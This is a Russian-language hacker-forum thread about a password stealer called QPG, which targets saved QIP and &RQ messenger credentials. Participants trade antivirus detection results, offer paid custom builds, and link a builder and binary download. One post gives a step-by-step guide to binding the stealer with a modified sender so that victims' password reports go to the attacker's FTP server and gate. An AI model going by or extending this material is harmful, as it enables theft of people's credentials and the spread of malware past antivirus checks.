посмотрел я эту поделку, улыбнул хвост файла))) вот люди курсовики делают, ага! D:\МАИ\4 семестр\Выч.мат. мой курсач\qpr\Debug\qpr.pdb по поводу размера - много лишнего, переделать по человечески чтоль
клиент не включен или это не qip, на qip infium не работает, работает только на обычном neprovad, я сам ток потмо заметил )) это стёб, к вычмату никакого отношения не имеею, просто забыл семнить дирректорию )) упакуй, будет ~33кб кому нужна отправка на фтп стучите в аську сделаю билд за 2$, лучше мне чем провайдеру каждый месяц ))) вес упакованного файла стал 81.5 можно еще уменьшить чуть-чуть, просто мне впадлу возможно добавление некоторых функций типа: RAS, &RQ, The BAT ))) на данный момент палится: Результат: 6/32 (18.75%) DrWeb 4.44.0.09170 2008.04.19 Trojan.PWS.LDPinch.1941 eSafe 7.0.15.0 2008.04.17 suspicious Trojan/Worm F-Secure 6.70.13260.0 2008.04.19 Suspicious:W32/Malware!Gemini Ikarus T3.1.1.26 2008.04.19 Packer.Malware.FriCryptor.B NOD32v2 3040 2008.04.19 unpack error Sophos 4.28.0 2008.04.19 Sus/UnkPacker
Делаем отправку отчетов на фтп (для чайников) Из-за неособой актуальности сего чуда расскажу как сделать для себя отправку на фтп: 1) делаем билд QPG, путь укажем например C:/file.xxx 2) берем исходник известного qip history sender'a, в нём заменяем "_srvlog.txt" на "boot.ini", а ".txt" меняем на наше ".xxx", вместо "C:\Program Files\QIP\" пишем "C:\", не забудем вписать ваш хост и путь до гейта, компилим. Эта программа будет слать отчет на фтп через гейт. 3) клеем 2 файла: сначала выбираем QPG Билд, потом берем переделанный нами history sender под отправку наших отчетов. Клеем. 4) размер получается очень большой => жмём и пользуемся что получается? Сначала создаётся наш отчет с нераспространённым расширением на диске "С" для удобного его поиска, далее он отправляется к нам на фтп, но не удаляется у жертвы. здесь написан лишь только самый простой пример как незная программирования осуществить отправку на фтп. Извиняюсь если кого насмешил, но я сам смеялся =)) Всем удачки, отпишитесь у кого работает и не работает если нетрудно, желаю удачи
Зачем доверие? Файрволл рулит и запускаешь есть много прог для мониторинга изменений при запуске приложений (по умному не получаеться сказать )
ну не все программы для защиты от вредоносного ПО могут всё отследить. видел я червей который на вопросы файервола умудрялся отвечать вместо пользователя)
Nickotin, очень содержательный пост... давайте не будем флудь пишите по делу: работает, не работает, предложения и пожелания или кто чем может помочь, может кто хочет присоединиться...
QPG Builder (ftp version) Для чаников,ленивых, тем кому не помог FAQ а также для удобства: На скорую руку был сделан билдер. +размер билда уменьшен до 77кб +добавлена новая функция &RQ - палится антивирусами Cкачать
Black dead, лови тогда билд, ищи 1___ и 2____ 1___ это "твой сайт.ру" 2___ это путь до гейта например /gate/gate.php Скачать file.exe с WebFile.RU
это зависит от того какой гейт ты используешь... а вот с таким я не сталкивался, но на 99% уверен что это виста
ой заметил касяк что в отчете приходит второй строчкой надпись "пароль от" =) а должно быть "пароль от &rq не найден" )) просто "&" вывод обрезала чтоли... это касяк пустяковый но глаза всеравно режет на днях додумаю чтобы с вистой касяка не было